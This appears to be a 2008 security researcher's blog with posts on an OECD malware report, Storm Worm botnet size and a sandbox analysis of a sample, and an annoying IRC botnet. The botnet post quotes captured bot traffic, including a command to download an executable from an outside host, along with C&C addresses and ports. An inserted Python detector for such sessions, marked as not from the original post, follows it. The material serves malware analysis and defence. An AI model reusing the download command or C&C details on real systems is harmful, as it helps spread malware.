Mail Problems

Thursday, June 5. 2008
The mail server of our university has been down for more than two days (sic!). I'm wondering how many mails I have lost up to now and what kind of interesting information did not reach me... If you want to reach me, please use the Gmail account. On the other hand: no distracting e-mails and lots of time to write papers. The ACSAC deadline is next Sunday; presumably I will have a paper ready by then :)

OECD Report on Malware

Wednesday, June 4. 2008
A few days ago, the OECD published a report entitled "Malicious Software (Malware): A Security Threat to the Internet Economy". It provides a high-level overview of current threats in the area of malware and is a nice read.

Excerpt: "This report, developed in collaboration with experts, aims to inform policy makers about malware impacts, growth and evolution, and countermeasures to combat malware. It seeks to analyse some of the main issues associated with malware and to explore how the international community can better work together to address the problem. Highlights include the following:
  • Spam has evolved from a nuisance to a vehicle for fraud to a vector for distributing malware. Malware, in the form of botnets, has become a critical part of a self sustaining cyber attack system. The use of malware has become more sophisticated and targeted. Many attacks are smaller and attempt to stay "below the radar" of the security and law enforcement communities.

  • The effectiveness of current security technologies and other protections in detecting and containing malware is challenged by the shrinking of the time between the discovery of vulnerabilities in software products and their exploitation.

  • [...]

  • Current response and mitigation are mainly reactive. There is a need for more structured and strategic co-ordination at national and international levels with involvement of all actors to more adequately assess and mitigate the risk of malware.

  • No single entity has a global understanding of the scope, trends, development and consequences of malware and thus the overall malware problem is difficult to quantify. Data on malware are not consistent and terminology for cataloguing and measuring the occurrence of malware is not harmonised.

  • Although its economic and social impacts may be hard to quantify, malware used directly or indirectly can harm critical information infrastructures, result in financial losses, and plays a role in the erosion of trust and confidence in the Internet economy."

A similar report was published a few months ago by ENISA: "Security Economics and The Internal Market" (Authors: R. Anderson, R. Böhme, R. Clayton, and T. Moore) - definitely worth reading!

Storm Worm Dead?

Tuesday, June 3. 2008
The Internet Storm Center ran a story today about a "New Stormworm download site". The Storm Worm botnet is thus still alive and propagating. However, the size of the botnet is decreasing significantly: currently, only about 8.2K hosts are online within the network (based on measurement results with the crawler presented in the LEET'08 paper). Compared to the size a few months ago (40K in January, even more a few months earlier), this is a strong decrease. Will the botnet thus become obsolete in the near future?

The CWSandbox analysis of the Storm Worm sample loveyou.exe (MD5: 0679c17b9072d378cb0a39272fed98f5) shows the typical signs of a Storm sample: it first drops a file called C:\WINDOWS\farkrish.exe and also writes the typical peer list:

Besides this, farkrish.exe is allowed to access the network and the infected machine syncs its time via NTP. The content of the UDP packets that are sent out has the same structure as always:
0000  10 a6 e6 22 f9 ca cc b0 2d a2 8c c7 de 57 ba 53
0010  5e c5 e5 a6 17 02 48 31 46
Thus it seems that there are no major changes in this new update release.

Annoying Botnets

Saturday, May 31. 2008
At cwsandbox.org, we receive quite a few binaries these days. However, we also receive lots of "uninteresting" files like hundreds of copies of Allaple, which we basically filter out in an automated way.
One particularly annoying family of malware samples we receive a lot of is the set of bots related to the two domains proxim.ircgalaxy.pl and ircd.zief.pl. We receive tens or even hundreds of samples of these bots per day. Both domains map to the same IP address 85.114.137.60, which belongs to a co-location provider in Germany. The provider has not yet reacted to abuse complaints, thus I am publishing a few more details about this botnet - perhaps someone else can help. The botnet related to the first domain has its Command & Control server listening on TCP port 65520, while the second botnet has its C&C server on TCP port 80. An example communication of one of these bots looks like this:
NICK rzyaaqgs
USER f020501 . . :-Service Pack 2
JOIN &virtu
:* PRIVMSG rzyaaqgs :!get http://dl2.teenpassage.com/~grander/unpr.exe
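As an added defender-side example (not code from the original post), the following Python snippet scores a captured IRC session for the bot traits visible in the exchange above: an OS fingerprint in the USER real name, a JOIN to a server-local "&" channel, and a "!get" command carrying a download URL sent straight to the client's nick. The two sessions and the download URL in the code are constructed sample input, not the real traffic.

```python
import re

# Constructed sample session in the style of the exchange quoted above;
# the URL is a placeholder, not the one from the post.
BOT_SESSION = """\
NICK rzyaaqgs
USER f020501 . . :-Service Pack 2
JOIN &virtu
:* PRIVMSG rzyaaqgs :!get http://dropper.example.invalid/unpr.exe
"""
# Constructed ordinary IRC session for comparison.
BENIGN_SESSION = """\
NICK alice
USER alice 0 * :Alice Example
JOIN #python
:bob!b@host PRIVMSG #python :anyone seen the new release notes?
"""
NICK_RE = re.compile(r"^NICK\s+(\S+)")
USER_RE = re.compile(r"^USER\s+\S+\s+\S+\s+\S+\s+:(.*)$")
JOIN_RE = re.compile(r"^JOIN\s+(\S+)")
PRIVMSG_RE = re.compile(r"^(?::\S+\s+)?PRIVMSG\s+(\S+)\s+:(.*)$")
CMD_URL_RE = re.compile(r"!(\w+)\s+(https?://\S+)")

def analyze_session(text):
    score, reasons, urls, nick = 0, [], [], None
    for line in (raw.strip() for raw in text.splitlines()):
        if m := NICK_RE.match(line):
            nick = m.group(1)
        elif m := USER_RE.match(line):
            # bots often stuff a host fingerprint (here the OS service pack) into the real name
            if "service pack" in m.group(1).lower():
                score += 2
                reasons.append("OS fingerprint in USER real name: " + m.group(1))
        elif m := JOIN_RE.match(line):
            if m.group(1).startswith("&"):  # server-local channel, unusual for human users
                score += 1
                reasons.append("JOIN to server-local channel " + m.group(1))
        elif m := PRIVMSG_RE.match(line):
            target, body = m.groups()
            if c := CMD_URL_RE.search(body):  # "!get <url>" style download command
                score += 3
                reasons.append("bot command !%s with download URL" % c.group(1))
                urls.append(c.group(2))
            if nick and target == nick:  # command sent straight to this client's nick
                score += 1
                reasons.append("command addressed directly to the client's nick")
    return score, reasons, urls

def is_bot_session(text, threshold=4):
    return analyze_session(text)[0] >= threshold
```

The returned URL list is what you would feed into blocklists or sandbox submission; the score threshold is a tunable assumption, not a property of the botnet.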

SPRING 3

Saturday, May 31. 2008
This is a Call for Abstracts for a German workshop for young researchers, thus the original announcement was published in German only.

---------------------------------------------------------------
Are you working in the field of reactive security?

Do you want to exchange ideas with others in your field?

Then we have something for you: the special interest group SIDAR ("Security - Intrusion Detection and Response") of the Gesellschaft für Informatik e.V. is organizing the third SPRING. SPRING offers young researchers in the field of reactive security a platform to establish topic-related contacts beyond their own university. This year, SPRING takes place on August 8 at the University of Mannheim.

We invite diploma and doctoral students to present their contributions. The talks can cover a broad spectrum, from still-ongoing projects that may be presented to a wider audience for the first time, to completed research work that has recently been presented at conferences or is to be presented there, or that forms a focus of the student's own diploma thesis or dissertation.

The range of topics in reactive security includes:
  • Vulnerability analysis
  • Intrusion detection
  • Malware
  • Incident management
  • Forensics

More information: SPRING 3 website.
---------------------------------------------------------------